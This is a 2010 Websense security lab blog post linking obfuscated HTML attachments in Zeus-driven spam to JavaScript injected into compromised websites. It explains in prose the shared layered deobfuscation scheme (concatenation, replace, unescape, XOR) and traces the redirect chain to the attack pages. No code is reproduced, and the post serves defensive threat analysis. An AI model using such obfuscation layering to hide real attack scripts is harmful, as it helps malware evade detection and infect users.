June 14, 2010

Drawing similarities between email and web attacks

Chris Astacio

Websense® Security Labs™ ThreatSeeker™ Network has detected an interesting correlation between recent rounds of malicious emails and the JavaScript files being used in mass injections.  First, let's think about recent malicious email campaigns.  If you review our recent blog posts about fake virus alerts and world cup-related malicious spam, you will see that the common theme in the two campaigns is that they contain heavily obfuscated scripts in the HTML attachments.  In fact, we've seen from our bot lab that Zeus variants seem to be responsible for these messages, as well as a number of other messages with different subjects and themes that have malicious HTML attachments.  The script from one of the email variants seemed oddly familiar.


Screenshot of one of the attached malicious HTML files:


Our ThreatSeeker™ Network puts us in the unique position of being able to scan emails and malicious Web sites to gain insights like these.  Follow up on another reported mass injection campaign revealed a similarity that shouldn't be ignored between the injected .js files on compromised sites and the email attachments.


Screenshot of a malicious JavaScript file used in the injection attacks:


In fact, after deobfuscating these by hand, we found that the two files use the same algorithm to deobfuscate their hidden contents.  These files fragment an obfuscated script amongst a number of variables in the file and concatenate them to get one long, obfuscated string.  This string then goes through a series of .replace functions to turn it into an escaped string.  Once the string is unescaped, the resulting character codes are obtained and used in an XOR operation.  The resulting string of numbers from this XOR are then decoded as character codes to obtain the final, clear HTML attack code.


Step 1:  Concatenate several variables to obtain one long, obfuscated string.


Step 2:  Decipher the above string with a number of .replace actions to get an escaped string.


Step 3:  Escape the above string to get a listing of seemingly random characters.


Step 4:  Obtain the character codes for each character in the above string.


Step5:  XOR the above character codes to get another string of character codes.


The final step is obtaining the characters that the above codes represent.  Below are the screen shots of the final and clear script code generated from deobufuscating the email attachment and the .js files which are inserted into compromised hosts.


Screenshot of the deobfuscated email attachments:


Screenshot of the deobfuscated JavaScript attack file:


Now, if we follow the HTTP transactions from visiting one of the injected sites, we really begin to see that these appear to be structured as the same attack, possibly coming from the same group.  Following one example, we can see that after the browser does a GET for the injected Java Script file, there are two more GETs for redirection proxies, until finally we land on the attack site at /index.php?pid=7.  From there, we have two other GET requests for /Applet7.html and /Notes7.pdf.  If you review the video we posted from the malicious virus alert emails, you will find that the flow for that attack was the same, except for the redirection proxies.


Screenshot of the HTTP flow after visiting an injected site:


Websense Messaging and Websense Web Security customers are protected against these attacks.

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.